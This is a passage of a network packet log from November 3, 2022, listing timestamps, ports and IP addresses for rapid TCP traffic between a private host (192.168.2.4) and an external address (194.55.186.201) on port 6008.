Nov 3, 2022 12:45:24.633944035 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.634037018 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.634140015 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.661276102 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.661330938 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.661345005 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.661353111 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.661360025 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.661417961 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.661617994 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.661696911 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.661822081 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.689328909 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689373970 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689395905 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689412117 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689430952 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689440012 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689449072 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689460039 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689553976 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689671993 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.689709902 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.690140009 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.690468073 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.690563917 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.717796087 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.717839003 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.717853069 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.717865944 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.717921019 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.717995882 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718173027 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718230009 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718245983 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718259096 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718329906 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718333960 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718354940 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718369961 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718400955 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718444109 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718446970 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718478918 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718518019 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718518019 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718554974 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718600035 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718641043 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718704939 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718758106 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718760014 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718821049 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.718858957 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718873978 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.718964100 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.719007015 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.719017982 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.719157934 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.719208002 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.719734907 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.719855070 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.719896078 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745624065 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745657921 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745673895 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745698929 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745716095 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745817900 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745866060 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.745995998 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.746046066 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746067047 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746083975 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746099949 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746135950 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746253014 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746308088 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.746360064 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.746360064 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.746375084 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746396065 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746397018 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.746412992 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.746422052 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746442080 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.746454954 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746471882 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746488094 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746592045 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746619940 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746634007 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746779919 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746843100 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746857882 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746964931 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.746982098 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747061968 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747087002 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747101068 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747226000 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747245073 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.747251034 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747286081 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747400045 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.747433901 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747462988 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747467041 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.747498035 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747518063 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747538090 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747615099 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747634888 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747773886 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747795105 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747796059 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.747813940 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.747921944 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748004913 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748028040 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748090982 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748203993 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748224020 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748328924 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748356104 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748363972 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.748363972 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.748392105 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748411894 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748483896 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748503923 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748601913 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748635054 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.748720884 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748744011 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748925924 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.748945951 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.748948097 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.749042988 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.749165058 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.749233961 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.773294926 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.773324013 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.773430109 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.773497105 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.773670912 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.773690939 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.773773909 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.773854971 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.773895979 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.774091959 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774121046 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774142027 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774162054 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774202108 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.774321079 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774343967 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774492979 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774523973 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774600029 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.774630070 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.774657965 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774729013 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.774755001 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.774780989 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.775279999 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.775405884 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.775414944 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.775479078 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.775573015 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.775705099 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.775803089 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.775805950 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.775878906 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.775974035 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776041985 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776112080 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.776112080 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776185036 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776283026 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.776288033 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776473999 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776520014 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776586056 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.776586056 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.776702881 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776813030 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776839018 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.776876926 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.776899099 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.776926994 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.777045012 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.777074099 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.777132988 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.777208090 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.777327061 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.777410030 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.777420998 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.777514935 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.777558088 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.777587891 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.777750015 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.777832985 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.777924061 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.777957916 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778053045 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778146029 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.778148890 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778249979 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778271914 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.778434992 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778481007 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.778537989 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.778652906 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778718948 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778753996 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.778781891 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.778851032 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.778956890 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779002905 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779030085 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779102087 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779102087 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779155016 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779186964 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779241085 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779280901 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779345989 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779354095 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779405117 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779438019 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779460907 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779498100 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779567003 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.779746056 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779833078 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779927015 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.779947996 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.780065060 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.780160904 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.780164003 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.780267000 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.780313969 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.780380964 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.780431032 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.780472994 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.780499935 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.780688047 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.780706882 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.780762911 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.780812025 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.781096935 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801095963 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801121950 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801235914 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801299095 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801299095 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801471949 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801597118 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801609993 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801645041 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801673889 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801703930 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801776886 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801794052 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801872015 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801879883 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.801934004 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.801944971 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802113056 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802143097 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802187920 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802218914 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.802234888 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802321911 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802397013 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802438974 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802592039 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802707911 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.802711964 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.802793026 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.803029060 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.803112030 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.803132057 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.803175926 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.803191900 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.803252935 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.803397894 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.803649902 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.803709984 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.803754091 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.803800106 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.803929090 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.803989887 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.804111958 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.804161072 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.804351091 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.804352999 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.804442883 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.804485083 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.804646015 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.804729939 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.804800034 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.805061102 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.805169106 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.805247068 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.805310011 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.805388927 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.805398941 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.805640936 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.805737019 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.805957079 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.806050062 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.806200981 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.806482077 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.806670904 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.806687117 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.806746006 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.806982040 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.807085991 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.807173967 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.807290077 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.807368994 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.807472944 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.807723045 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.807791948 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.807825089 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.807862997 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.807919979 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.807988882 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.808002949 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.808177948 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.808283091 CET	6008	49699	194.55.186.201	192.168.2.4
